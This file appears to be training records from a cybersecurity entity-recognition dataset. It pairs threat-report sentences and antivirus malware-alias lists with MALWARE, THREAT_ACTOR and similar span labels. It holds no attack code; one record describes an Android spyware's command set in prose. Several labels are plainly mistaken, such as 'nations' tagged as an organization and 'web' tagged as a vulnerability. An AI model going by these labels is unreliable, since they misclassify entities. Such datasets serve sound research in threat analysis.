{"text": "A backdoor also known as: Trojan.Antavmu.Win32.50 Trojan/Antavmu.ejw Trojan.Heur2.RP.E5C8CC Win32.Trojan.WisdomEyes.16070401.9500.9564 W32/Trojan2.IKTO Downloader.Trojan Win.Trojan.Antavmu-74 Trojan-Downloader.Win32.Murlo.vqg Trojan.Win32.Antavmu.wseg Spyware.Antavmu.455005 TrojWare.Win32.Antavmu.~bar Trojan.1 Trojan.Win32.Antavmu W32/Trojan.ASFC-3590 Trojan.Antavmu.y Troj.W32.Antavmu.jf!c Trojan-Downloader.Win32.Murlo.vqg Trojan/Win32.Antavmu.R18411 Trojan.1 Trojan.Antavmu!m7hjC7OtKPY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000010", "source": "cyner2_train"}}
{"text": "A new online banking malware with the same technique used in Operation Emmental has been hitting users in Japan.", "spans": {"MALWARE: banking malware": [[13, 28]], "THREAT_ACTOR: Operation Emmental": [[61, 79]]}, "info": {"id": "cyner2_train_000014", "source": "cyner2_train"}}
{"text": "The name of this injector is based on its version information which is the same for both dotRunpeX versions, consistent across all samples we analyzed and containing ProductName – RunpeX.Stub.Framework.", "spans": {"MALWARE: injector": [[17, 25]], "MALWARE: dotRunpeX versions,": [[89, 108]], "MALWARE: ProductName": [[166, 177]]}, "info": {"id": "cyner2_train_000017", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_DROPPER.FK Win32.Trojan.WisdomEyes.16070401.9500.9995 Infostealer.Gampass TROJ_DROPPER.FK Trojan.Win32.XDR.euxmtw Trojan.MulDrop.18385 BehavesLike.Win32.Virut.cc Win32.Infect.a.124448 Win32/Trojan.5f3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000020", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Delfsnif W32/Backdoor2.GYBX Backdoor.Trojan Trojan.Win32.Delphi.bjxrjc BehavesLike.Win32.Rontokbro.dm W32/Backdoor.XFVH-7108 Backdoor.Delfsnif Trj/CI.A Win32.Trojan.Crypt.Alih Hoax.Win32.BadJoke.FakeKAV Win32/Trojan.160", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000022", "source": "cyner2_train"}}
{"text": "However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA.", "spans": {"ORGANIZATION: nations": [[59, 66]]}, "info": {"id": "cyner2_train_000023", "source": "cyner2_train"}}
{"text": "The documents were found to drop the following malware families: The previously discussed CONFUCIUS_B malware family A backdoor previously not discussed in the public domain, commonly detected by some antivirus solutions as BioData A previously unknown backdoor that we have named MY24", "spans": {"MALWARE: malware families:": [[47, 64]], "MALWARE: CONFUCIUS_B malware family": [[90, 116]], "MALWARE: backdoor": [[119, 127]], "SYSTEM: antivirus solutions": [[201, 220]], "MALWARE: unknown backdoor": [[245, 261]], "MALWARE: MY24": [[281, 285]]}, "info": {"id": "cyner2_train_000025", "source": "cyner2_train"}}
{"text": "The spammed attachments are using a RTF trick or a feature of Windows OS that allows dropping an executable – but not running it – simply by opening the RTF document", "spans": {}, "info": {"id": "cyner2_train_000027", "source": "cyner2_train"}}
{"text": "Every sample we found was different in size and activity from the others but the internal name and other identifiers were disturbingly similar.", "spans": {}, "info": {"id": "cyner2_train_000029", "source": "cyner2_train"}}
{"text": "The malware disguises itself as a file helper app and then uses very advanced anti-debug and anti-hook techniques to prevent it from being reverse engineered.", "spans": {"MALWARE: malware": [[4, 11]]}, "info": {"id": "cyner2_train_000030", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.KillAV.60689 Packed.Win32.TDSS!O Trojan.KillAV.Win32.3036 Trojan/KillAV.caq W32/Trojan2.GLAK Infostealer.Onlinegame Trojan.Win32.KillAV.60689 TrojWare.Win32.Patched.KSU Trojan.Click.28899 Trojan.1 W32/Trojan.ANJW-2244 Trojan/KillAV.qx Worm:Win32/QQnof.A Trojan.Zusy.D1B0EC Troj.W32.KillAV.caq!c Trojan/Win32.KillAV.C155326 Trojan.1 Trojan.Win32.Jhee W32/KillAV.CAQ!tr Trj/KillAV.FJ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000031", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9979 Backdoor.Trojan Win32/Cyreho.A Trojan.DownLoad2.18592 W32.Trojan.Trojan-Backdoor-Cele TR/Dldr.Ftp.E Trojan/Win32.Unknown Trojan.Heur.VP.E82FB1 Trojan:Win32/Cyreho.A Trojan.VBRA.02524 Win32.Trojan.Dldr.Oyeu Trojan.Win32.Darkddoser W32/VB.NZ!tr Win32/Trojan.9b7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000032", "source": "cyner2_train"}}
{"text": "Additionally, we have observed instances of the IsSpace and TidePool malware families being delivered via the same techniques.", "spans": {"MALWARE: IsSpace": [[48, 55]], "MALWARE: TidePool malware families": [[60, 85]]}, "info": {"id": "cyner2_train_000033", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Pccontrol.2.1 Backdoor.Pccontrol.2.1 Backdoor.PcControl!Vqgcs0rOUEs PcControl.C Backdoor.Win32.PcControl.21 Backdoor.Pccontrol.2.1 Trojan.Win32.PcControl.cbiyio Backdoor.Pccontrol.2.1 Backdoor.Win32.PcControl.21 Backdoor.Pccontrol.2.1 BackDoor.Control.21 BKDR_PCCONTROL.A W32/Risk.SRBI-7988 BDS/PcControl.21.1 Trojan[Backdoor]/Win32.PcControl Backdoor:Win32/PCControl.2_1 Backdoor.Pccontrol.2.1 Backdoor.Pccontrol.2.1 Backdoor.PcControl Backdoor.Win32.PcControl.aa Win32/PcControl.21 W32/PcCont.21!tr.bdr BackDoor.Pccontrol.C Bck/PcControl.21", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000034", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Bacterio61.A Trojan.Bacterio61.A Trojan.Bacterio61.r3 Trojan.Bacterio61.A Trojan.Bacterio61.A Trojan.Bacterio61!xosA0+L/cz0 Trojan.Dropper TROJ_BACTERIO.61 Trojan.Win32.Bacterio61 Trojan.Win32.Bacterio61.fdse Trojan.Win32.RenAll[h] PE:Trojan.Bacterio61!1073791980 Trojan.Bacterio61.A TrojWare.Win32.RenAll Trojan.Bacterio61.A Trojan.Bacterio61.Win32.1 TROJ_BACTERIO.61 W32/Virus.NFQE-4477 Trojan/Win32.Bacterio61 Win32.Troj.Bacterio61.kcloud Win-Trojan/RenAll.94208 Trojan.Bacterio61.A Win32.Trojan.Bacterio61.ddnb W32/Bacterio61.A!tr Trojan.Win32.Bacterio61.aW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000035", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.CDB.3cb9 Virus.Win32.Patched", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000036", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.4CE7 Backdoor/W32.Tropoly.C Backdoor.CPEX.Win32.21496 Trojan/Inject.aisx Trojan.Heur.E7B492 Trojan.Win32.A.Inject.48640.F TrojWare.Win32.Pincav.N Trojan.PWS.Reggin.91 BehavesLike.Win32.Ramnit.pc Trojan.Win32.Inject Trojan/Inject.hnq Troj.W32.Inject.aisx!c Trojan/Win32.OnlineGameHack.R2669 PWS-OnlineGames.ge BScope.TrojanPSW.Magania.1314 Trojan.Inject!H2RbMIi2jvQ Trj/Inject.IR Win32/Trojan.65a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000039", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Tregwihc.Trojan Trojan.Inject.GK Worm/W32.AutoRun.114688 W32/Autorun.worm.dw W32/AutoRun.lrf TROJ_FAM_0000e93.TOMA Win32.Trojan.WisdomEyes.16070401.9500.9992 W32/Worm.FWLR-5025 Trojan.Minit Win32/Milsni.D TROJ_FAM_0000e93.TOMA Win.Worm.Autorun-376 Win32.Rootkit.Uroburos.C Trojan.Inject.GK Trojan.Win32.AutoRun.ftwn Worm.Win32.Autorun.114688.I W32.W.AutoRun.lrf!c Trojan.Inject.GK Worm.Win32.AutoRun.COB Trojan.Inject.GK Win32.HLLW.Autoruner.5122 Worm.AutoRun.Win32.35 W32/Autorun.worm.dw W32/Worm.AKXJ Worm/AutoRun.fma Worm:Win32/Yacspeel.A.dll WORM/Autorun.Byt.34 Worm/Win32.AutoRun Worm:Win32/Yacspeel.A.dll Worm/Win32.AutoRun.R1836 Trojan.Inject.GK Worm.Win32.AutoRun.byt Trj/Autorun.RN Win32/AutoRun.COB Win32.Worm.Autorun.Lohz Virus.Win32.AutoRun.sd W32/AutoRun.BDJ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000040", "source": "cyner2_train"}}
{"text": "A backdoor also known as: LNK.Trojan.3171 LNK/Trojan.TPJW-5 LNK_ARGULONG.SMLNK HEUR:Trojan.WinLNK.Powecod.a LNK_ARGULONG.SMLNK LNK/Trojan.TPJW-5 HEUR:Trojan.WinLNK.Powecod.a Trojan.LNK virus.lnk.powershell.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000041", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SasfisB.Worm Win32.Worm.Wukill.D Email-Worm.Win32.Rays!O Worm.WuKill Worm.Rays.Win32.1 Worm.Wukill Win32.Worm-Email.Rays.a W32.Wullik@mm Win.Worm.Rays-1 Email-Worm.Win32.Rays.d Win32.Worm.Wukill.D Trojan.Win32.Rays.cvmxdt W32.W.Basun.lwAE Trojan.Win32.FakeFolder.wid Win32.Worm.Wukill.D Win32.Worm.Wukill.D Win32.HLLM.Xgray Email-Worm.Win32.Rays Worm.Rays.d.49152 Win32.Worm.Wukill.D I-Worm.Win32.Rays.49152 Email-Worm.Win32.Rays.d Win32.Trojan.Wukill.B Win32/Rays.worm.15024 Win32.Worm.Wukill.D SScope.Trojan.VBRA.4977 I-Worm.Wukill.B W32/Fawkes.A!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000043", "source": "cyner2_train"}}
{"text": "The document contains an encoded Visual Basic Script VBScript typical of previous Carbanak malware.", "spans": {"MALWARE: Carbanak malware.": [[82, 99]]}, "info": {"id": "cyner2_train_000044", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Fynloski.H Win32.Trojan Trojan.MSIL.Crypt.cxp Trojan.Inject.54745 TR/PSW.Fignotok.LW Trojan-Dropper.Small!IK Trojan/Jorik.ovo TrojanDownloader:Win32/Batosecu.A Trojan/Win32.Jorik Trojan.Jorik.Fynloski.ft Trojan-Dropper.Small Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000045", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Joke.Jepruss Hoax.Win32.BadJoke!O Joke.Russianjep Joke.Jepruss Joke.Jepruss W32/Joke.NX Joke.JepRuss JOKE_ONLYGAME.A Win.Joke.Jep-1 Joke.Jepruss Hoax.Win32.BadJoke.JepRuss Joke.Jepruss Riskware.Win32.JepRuss.hybz Joke.Win32.FakeScreen Hoax.W32.BadJoke.JepRuss!c Joke.Jepruss Joke.Win32.Jep.Russ Joke.Jepruss Joke.Justgame Tool.BadJoke.Win32.23 JOKE_ONLYGAME.A W32/Joke.TMKA-5158 not-virus:Joke.Win32.JepRuss HackTool[Hoax]/Win32.JepRuss Win32.Joke.JepRuss.kcloud Hoax.Win32.BadJoke.JepRuss Win-Joke/Delete_Game.916512 Win32/Jep.Russ Win32.Trojan-psw.Badjoke.Lmkt Trojan.Jep!7Qg0TmyJLB0 Joke.Win32.RussianJep", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000046", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Seimon.G Trojan.Seimon.G Trojan.Seimon.G Trojan.Seimon!4f7JwSpV94c Trojan.Seimon.G TrojWare.Win32.Trojan.Seimon.G0 Trojan.Seimon.G Trojan.DownLoad.3195 BehavesLike.Win32.PWSGamania.lh W32/PhishExe.B!tr.dldr Trojan[:HEUR]/Win32.Unknown Trojan.Seimon.G Trojan/Win32.Casino BScope.Trojan-Downloader.ILoveLanch.pj Virus.Win32.Cloaker Trojan.Seimon.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000047", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9563 W32/Application.THZK-5586 BehavesLike.Win32.BadFile.rc Trojan.Win32.PSW Trojan.Application.Zusy.D3D00C Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000048", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.KillFiles!O Trojan.Birele Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Risk.GBTW-1754 Ransom_Birele.R038C0DLB17 Trojan-Ransom.Win32.Birele.gss Trojan.Win32.Dropper.rpje Trojan.Win32.Scar.56320.B Troj.Ransom.W32.Birele!c Worm.Win32.Autorun.GVIT Trojan.MulDrop1.6138 Trojan.Birele.Win32.7887 BehavesLike.Win32.Ransom.fc Virus.Win32.VBInject W32/MalwareS.BBSH Trojan/Scar.pgv Trojan/Win32.KillFiles PWS:Win32/Kiction.A Trojan.Zusy.DAEF Trojan/Win32.Scar.R18936 Trojan-Ransom.Win32.Birele.gss Worm.Spreader Worm.AutoRun Win32.Trojan.Birele.Pgda W32/KillFiles.GMU!tr Win32/Trojan.Ransom.f31", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000051", "source": "cyner2_train"}}
{"text": "Here is a command and control protocol fragment : Commands from C2 server parsing In total , the malicious APK handles 16 different commands : Command Endpoint Description 1 reqsmscal.php Send specified SMS message 2 reqsmscal.php Call specified number 3 reqsmscal.php Exfiltrate device info , such as phone model and OS version 4 reqsmscal.php Exfiltrate a list of all installed applications 5 reqsmscal.php Exfiltrate default browser history ( limited to a given date ) 6 reqsmscal.php Exfiltrate Chrome browser history ( limited to a given date ) 7 reqsmscal.php Exfiltrate memory card file structure 8 reqsmscal.php Record surrounding sound for 80 seconds 1 reqcalllog.php Exfiltrate all call logs 2 reqcalllog.php Exfiltrate all SMS messages 3 reqcalllog.php Upload specified file from the device to the C2 4 reqcalllog.php Download file from specified URL and save on device 5 reqcalllog.php Delete specified file 6,7,8 reqcalllog.php Commands not yet implemented 9 reqcalllog.php Take photo ( muted audio ) with rear camera , send to C2 10 reqcalllog.php Take photo ( muted audio ) with front camera , send to C2 All observed samples with Smali injections were signed by the same debug certificate ( 0x936eacbe07f201df ) .", "spans": {}, "info": {"id": "cyner2_train_000052", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Jacard Win32.Trojan.WisdomEyes.16070401.9500.9987 W32/Trojan.YDYO-6019 Trojan-Banker.BestaFera Trojan-Banker.Win32.BestaFera.amyc Trojan.Win32.Banker.euxhdn Trojan.Win32.Z.Jacard.2528768 BehavesLike.Win32.BadFile.vh TR/Spy.Banker.vvhlz Trojan[Banker]/Win32.BestaFera TrojanDownloader:Win32/Qulkonwi.A Trojan.Jacard.D8CA Trojan-Banker.Win32.BestaFera.amyc Trj/GdSda.A Win32.Trojan-banker.Bestafera.Wmsm W32/Banker.ADUT!tr.spy Win32/Trojan.252", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000056", "source": "cyner2_train"}}
{"text": "Recently the Mobile Malware Research Team of Intel Security found on Google Play a new campaign of Android/Clicker.G in dozens of published malicious apps.", "spans": {"ORGANIZATION: Mobile Malware Research Team of Intel Security": [[13, 59]], "SYSTEM: Google Play": [[69, 80]], "THREAT_ACTOR: campaign": [[87, 95]], "SYSTEM: malicious apps.": [[140, 155]]}, "info": {"id": "cyner2_train_000057", "source": "cyner2_train"}}
{"text": "AlienVault Labs has extracted related samples and located the infrastructure used by attackers", "spans": {"ORGANIZATION: AlienVault Labs": [[0, 15]], "THREAT_ACTOR: attackers": [[85, 94]]}, "info": {"id": "cyner2_train_000059", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Brackash.C Trojan.Brackash.C Win32.Trojan.WisdomEyes.16070401.9500.9774 Trojan.Win32.Sadenav.b Trojan.Brackash.C Trojan.Brackash.C Brackash.dll Virus.Trojan.Win32.Sadenav Trojan/Sadenav.aic W32.Trojan.Brackash.C TR/Brackash.C100.2 Trojan/Win32.Sadenav Trojan.Brackash.C Trojan.Win32.Sadenav.b Trojan/Win32.Sadenav.R1894 Brackash.dll Trojan.Brackash.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000060", "source": "cyner2_train"}}
{"text": "One of the most common ways to do this is by displaying advertisements to users or by offering in-app purchases IAPs.", "spans": {}, "info": {"id": "cyner2_train_000061", "source": "cyner2_train"}}
{"text": "This blog post outlines the details about the campaign that we discovered.", "spans": {"THREAT_ACTOR: campaign": [[46, 54]]}, "info": {"id": "cyner2_train_000064", "source": "cyner2_train"}}
{"text": "A new CC infrastructure consisting of a climbing club website.", "spans": {"SYSTEM: CC infrastructure": [[6, 23]]}, "info": {"id": "cyner2_train_000067", "source": "cyner2_train"}}
{"text": "A backdoor also known as: O97M.Dropper.BR W97M.Downloader W2000M/Dldr.Rogue.aipbta HEUR.VBA.Trojan.e virus.office.qexvmc.1095", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000068", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.BackdoorSlingup.Trojan Trojan/W32.Fsysna.77824.F Heur.Win32.VBKrypt.3!O Backdoor.Slingup.MF.150 Win32.Worm.VB.rt W32/Trojan.XMLD-4299 W32.Difobot BKDR_GORYNYCH.SM Trojan.Win32.Fsysna.ccit Trojan.Win32.Fsysna.dwujaf Troj.W32.Fsysna.tnPd Trojan.DownLoader14.15241 Trojan.Fsysna.Win32.7242 BKDR_GORYNYCH.SM BehavesLike.Win32.Backdoor.lt Worm.Win32.VB W32/Trojan3.TRB Trojan/Fsysna.dgo Trojan/Win32.Fsysna Trojan.Win32.Fsysna.ccit Trojan/Win32.VBInject.R158763 Trojan.Fsysna Trojan.Reconyc Win32/VB.OOB Win32.Trojan.Fsysna.Phgj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000069", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor:MSIL/Hulpob.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000070", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Fsysna Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.HAEY-9385 Trojan.Bisonal Trojan.Win32.Fsysna.ccap Troj.W32.Fsysna!c Trojan.DownLoad3.19183 BehavesLike.Win32.Dropper.vz Trojan.Win32.Fsysna.ccap Trojan:Win32/Korlia.C Win-Trojan/Biscon.3140 Trj/CI.A Win32.Trojan.Fsysna.Tayn W32/Fsysna.CCAP!tr Win32/Trojan.732", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000071", "source": "cyner2_train"}}
{"text": "In addition, the compromised devices were pushed Trojan updates, which allowed the attackers to extend their capabilities.", "spans": {"SYSTEM: compromised devices": [[17, 36]], "MALWARE: Trojan updates,": [[49, 64]], "THREAT_ACTOR: attackers": [[83, 92]]}, "info": {"id": "cyner2_train_000072", "source": "cyner2_train"}}
{"text": "In February 2016 one of the largest cyber heists was committed and subsequently disclosed.", "spans": {"THREAT_ACTOR: largest cyber heists": [[28, 48]]}, "info": {"id": "cyner2_train_000073", "source": "cyner2_train"}}
{"text": "Cyber espionage actors, now designated by FireEye as APT32 OceanLotus Group, are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists.", "spans": {"THREAT_ACTOR: Cyber espionage actors,": [[0, 23]], "ORGANIZATION: FireEye": [[42, 49]], "THREAT_ACTOR: APT32 OceanLotus Group,": [[53, 76]], "ORGANIZATION: private sector companies": [[110, 134]], "ORGANIZATION: industries": [[151, 161]], "ORGANIZATION: foreign governments, dissidents,": [[185, 217]], "ORGANIZATION: journalists.": [[222, 234]]}, "info": {"id": "cyner2_train_000074", "source": "cyner2_train"}}
{"text": "The infected apps in this campaign were downloaded several million times by unsuspecting users.", "spans": {"SYSTEM: infected apps": [[4, 17]], "THREAT_ACTOR: campaign": [[26, 34]]}, "info": {"id": "cyner2_train_000075", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Bot.MSIL Trojan.Win32.StartPage.czmqzt Trojan.DownLoader12.20620 BehavesLike.Win32.Backdoor.ch TR/Dropper.MSIL.47116 MSIL/StartPage.AI!tr Trj/CI.A Msil.Trojan.Dropper.Hqll Trojan.MSIL.StartPage MSIL3.BCNZ Trojan.MSIL.StartPage.AI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000077", "source": "cyner2_train"}}
{"text": "Primarily targets users in Brazil with fake attatchments, for example: Auto_De_Infracao_e_Sua_Notificacao_493275324.exe", "spans": {}, "info": {"id": "cyner2_train_000078", "source": "cyner2_train"}}
{"text": "This is named Red Leaves after strings found in the malware.", "spans": {"THREAT_ACTOR: Red Leaves": [[14, 24]], "MALWARE: malware.": [[52, 60]]}, "info": {"id": "cyner2_train_000080", "source": "cyner2_train"}}
{"text": "The malware first discovery was after a highly Libyan influential Telegram account compromised via web", "spans": {"MALWARE: malware": [[4, 11]], "ORGANIZATION: highly Libyan influential": [[40, 65]], "VULNERABILITY: web": [[99, 102]]}, "info": {"id": "cyner2_train_000082", "source": "cyner2_train"}}
{"text": "Recently, we saw an app that leads to a third-party app store being offered on the official iOS App Store.", "spans": {"MALWARE: app": [[20, 23]], "SYSTEM: third-party app store": [[40, 61]], "SYSTEM: official iOS App Store.": [[83, 106]]}, "info": {"id": "cyner2_train_000083", "source": "cyner2_train"}}
{"text": "This paper presents ESET's findings about Operation Groundbait based on our research into the Prikormka malware family.", "spans": {"ORGANIZATION: ESET's": [[20, 26]], "THREAT_ACTOR: Operation Groundbait": [[42, 62]], "MALWARE: Prikormka malware family.": [[94, 119]]}, "info": {"id": "cyner2_train_000084", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.AutoRun!O Worm.AutoRun.13924 W32.W.Fearso.kYUv HT_STARTPAGE_FB090419.UVPM Win32.Trojan.Delf.it HT_STARTPAGE_FB090419.UVPM Win.Trojan.Delf-1006 Trojan.Win32.Fsysna.digg TrojWare.Win32.Magania.~AD Worm.Delf.Win32.1099 Trojan[GameThief]/Win32.Nilage Trojan.Jacard.D150AA Trojan.Win32.Fsysna.digg HackTool.Win32.InjectDll.a Trojan.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000085", "source": "cyner2_train"}}
{"text": "In the course of our research we uncovered the activity of a hacking group which has Chinese origins.", "spans": {"THREAT_ACTOR: hacking group": [[61, 74]]}, "info": {"id": "cyner2_train_000086", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/Darby.N Win32.Worm.P2p.Darby.N Worm/W32.Darby.140470 W32.W.Darby.n!c Win32.Worm.P2p.Darby.N Worm.P2P.Darby!NxHEqfnePM8 W32/Darby.M W32.HLLW.Darby Win32/Darby.N P2P-Worm.Win32.Darby.n Trojan.Win32.Darby.epif Worm.Win32.Darby.140470.B[h] Win32.Worm.P2p.Darby.N Worm.Win32.Darby.N Win32.Worm.P2p.Darby.N BehavesLike.Win32.MultiDropper.cc W32/Darby.KOEV-0225 Worm/Darby.f WORM/Darby.N W32/Darby.N!tr Worm[P2P]/Win32.Darby Win32.Worm.P2p.Darby.N Win32/Darby.worm.140470 Worm:Win32/Darby.N Virus.Win32.Heur.p Win32.Worm-p2p.Darby.Pdwh P2P-Worm.Win32.Darby Win32.Worm.P2p.Darby.N Worm/Darby.P", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000088", "source": "cyner2_train"}}
{"text": "Yesterday, Microsoft patched CVE-2015-2424, a vulnerability in Microsoft Office discovered by iSIGHT Partners while monitoring the Russian cyber espionage team we call Tsar Team.", "spans": {"ORGANIZATION: Microsoft": [[11, 20]], "VULNERABILITY: vulnerability": [[46, 59]], "SYSTEM: Microsoft Office": [[63, 79]], "ORGANIZATION: iSIGHT Partners": [[94, 109]], "THREAT_ACTOR: Russian cyber espionage team": [[131, 159]], "THREAT_ACTOR: Tsar Team.": [[168, 178]]}, "info": {"id": "cyner2_train_000089", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsIemusi.2209 W32/Trojan.GCQE-8180 DDOS_HPNITOL.SM Trojan.Boht Trojan.Win32.DownLoad.bfqxfq Troj.W32.Vilsel.lmbl Trojan.DownLoad3.40817 BehavesLike.Win32.HLLPPhilis.lc Backdoor:Win32/Bezigate.B Trj/CI.A Win32/Delf.AJG Backdoor.Win32.PcClient W32/Inject.VXTT!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000091", "source": "cyner2_train"}}
{"text": "During an incident response engagement in September 2016, SecureWorks® incident response analysts observed payment card data being collected by a generic remote access trojan RAT rather than typical memory-scraping malware.", "spans": {"ORGANIZATION: SecureWorks® incident response analysts": [[58, 97]], "MALWARE: generic remote access trojan RAT": [[146, 178]], "MALWARE: typical memory-scraping malware.": [[191, 223]]}, "info": {"id": "cyner2_train_000098", "source": "cyner2_train"}}
{"text": "The said attackers, who showed familiarity and in-depth knowledge of their agencies' network topology, tools, and software, were able to gain access to their targeted servers and install malware.", "spans": {"THREAT_ACTOR: attackers,": [[9, 19]], "SYSTEM: agencies' network topology, tools, and software,": [[75, 123]], "SYSTEM: targeted servers": [[158, 174]], "MALWARE: malware.": [[187, 195]]}, "info": {"id": "cyner2_train_000099", "source": "cyner2_train"}}
{"text": "That attack was spearheaded by the malware ESET products detect as Diskcoder.C aka ExPetr, PetrWrap, Petya, or NotPetya.", "spans": {"MALWARE: malware": [[35, 42]], "SYSTEM: ESET products": [[43, 56]], "MALWARE: ExPetr, PetrWrap, Petya,": [[83, 107]], "MALWARE: NotPetya.": [[111, 120]]}, "info": {"id": "cyner2_train_000100", "source": "cyner2_train"}}
{"text": "Early September, Skycure Research Labs detected a fake app within one of our customer's organizations, identified through our crowd-sourced intelligence policies whereby anyone running the Skycure mobile app acts as a threat detecting sensor.", "spans": {"ORGANIZATION: Skycure Research Labs": [[17, 38]], "SYSTEM: fake app": [[50, 58]], "ORGANIZATION: customer's organizations,": [[77, 102]], "SYSTEM: crowd-sourced intelligence policies": [[126, 161]], "SYSTEM: Skycure mobile app": [[189, 207]], "SYSTEM: threat detecting sensor.": [[218, 242]]}, "info": {"id": "cyner2_train_000101", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Udsdangerousobject.Multi Trojan.Scar.Win32.107576 Uds.Dangerousobject.Multi!c Trojan.Win32.Scar.qiea Trojan.Win32.Scar.eujcfc BehavesLike.Win32.Downloader.vc Trojan.Win32.Scar W32/Trojan.TSAL-4013 Trojan.Scar.kdh TR/Scar.xdjbi Trojan/Win32.Scar Trojan.Win32.Scar.qiea TrojanDropper:Win32/NukeSped.V Trojan/Win32.Scar.C2237182 Trojan.Scar Trj/GdSda.A Win32.Trojan.Scar.Hnkz Trojan.Scar!JEdUZG9Z4dw Win32/Trojan.6bc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000102", "source": "cyner2_train"}}
{"text": "BlackSnake Ransomware is a new strain of malware that encrypts files and demands a ransom from victims, and is capable of performing clipper operations aimed at cryptocurrency users, according to Cyble Research and Intelligence Labs.", "spans": {"MALWARE: BlackSnake Ransomware": [[0, 21]], "MALWARE: malware": [[41, 48]], "ORGANIZATION: cryptocurrency users,": [[161, 182]], "ORGANIZATION: Cyble Research": [[196, 210]]}, "info": {"id": "cyner2_train_000103", "source": "cyner2_train"}}
{"text": "For bogus applications to be profitable, they should be able to entice users into installing them.", "spans": {}, "info": {"id": "cyner2_train_000104", "source": "cyner2_train"}}
{"text": "The group is highly selective in its approach and only appears to deploy its full range of tools once it establishes that the compromised organization is an intended target.", "spans": {}, "info": {"id": "cyner2_train_000107", "source": "cyner2_train"}}
{"text": "It relies on spear-phishing emails sent to specific and strategic companies to conduct its campaigns.", "spans": {"ORGANIZATION: companies": [[66, 75]], "ORGANIZATION: campaigns.": [[91, 101]]}, "info": {"id": "cyner2_train_000108", "source": "cyner2_train"}}
{"text": "VXRLcredit contacted us regarding an APT phishing email that included a download link to a malware being hosted on a Geocities website.", "spans": {"ORGANIZATION: VXRLcredit": [[0, 10]], "THREAT_ACTOR: APT": [[37, 40]], "MALWARE: malware": [[91, 98]]}, "info": {"id": "cyner2_train_000109", "source": "cyner2_train"}}
{"text": "The group's activities have gained attention due to their ongoing use of DLL hijacking via Microsoft Distributed Transaction Coordinator MSDTC to extract and launch ransomware payloads.", "spans": {"THREAT_ACTOR: The group's": [[0, 11]], "SYSTEM: Microsoft Distributed Transaction Coordinator MSDTC": [[91, 142]], "MALWARE: ransomware payloads.": [[165, 185]]}, "info": {"id": "cyner2_train_000110", "source": "cyner2_train"}}
